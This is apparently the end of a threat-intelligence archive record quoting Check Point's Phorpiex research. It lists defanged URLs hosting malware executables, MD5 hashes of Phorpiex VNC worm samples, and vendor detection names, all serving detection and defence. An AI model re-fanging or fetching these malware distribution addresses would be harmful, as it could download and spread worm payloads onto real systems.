Tldr:\r\nhxxp://185.176.27[.]132/a.exe\r\nhxxp://aiiaiafrzrueuedur.ru/o.exe\r\nhxxp://185.176.27[.]132/1\r\nhxxp://185.176.27[.]132/2\r\nhxxp://185.176.27[.]132/3\r\nhxxp://185.176.27[.]132/4\r\nhxxp://185.176.27[.]132/5\r\nhxxp://185.176.27[.]132/6\r\nhxxp://185.176.27[.]132/7\r\nhxxp://193.32.161[.]69/1.exe\r\nhxxp://193.32.161[.]69/2.exe\r\nhxxp://193.32.161[.]69/3.exe\r\nhxxp://193.32.161[.]69/4.exe\r\nhxxp://193.32.161[.]69/5.exe\r\nhxxp://193.32.161[.]69/6.exe\r\nhxxp://193.32.161[.]69/7.exe\r\nhxxp://193.32.161[.]69/ya.exe\r\nhxxp://193.32.161[.]73/1\r\nhxxp://193.32.161[.]73/2\r\nhxxp://193.32.161[.]73/3\r\nhxxp://193.32.161[.]73/4\r\nhxxp://193.32.161[.]73/5\r\nhxxp://193.32.161[.]73/6\r\nhxxp://193.32.161[.]73/s.exe\r\nhxxp://193.32.161[.]77/11.exe\r\nPhorpiex VNC Worm\r\nMD5 Downloaded From\r\n28436a88ee38c5f3b50ffe6ae250b358 hxxp://92.63.197.38/4.exe\r\n262148aee0263d710fad294da40f00fc hxxp://92.63.197.60/5.exe\r\n33da71f4068bb396ecd1010132abad00 hxxp://92.63.197.153/4.exe\r\n6fad1536ab4a9ab46d054ad76996b2d6 hxxp://92.63.197.153/3.exe\r\nCheck Point Anti-Bot blade provides protection against this threat:\r\nWorm.Win32.Phorpiex.C\r\nWorm.Win32.Phorpiex.D\r\nWorm.Win32.Phorpiex.H\r\nSource: https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/"
	],
	"report_names": [
		"phorpiex-arsenal-part-i"
	],
	"threat_actors": [],
	"ts_created_at": 1775439040,
	"ts_updated_at": 1775826739,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9773519a92d2dac0491f505f37e9b238405118b9.pdf",
		"text": "https://archive.orkl.eu/9773519a92d2dac0491f505f37e9b238405118b9.txt",
		"img": "https://archive.orkl.eu/9773519a92d2dac0491f505f37e9b238405118b9.jpg"
	}
}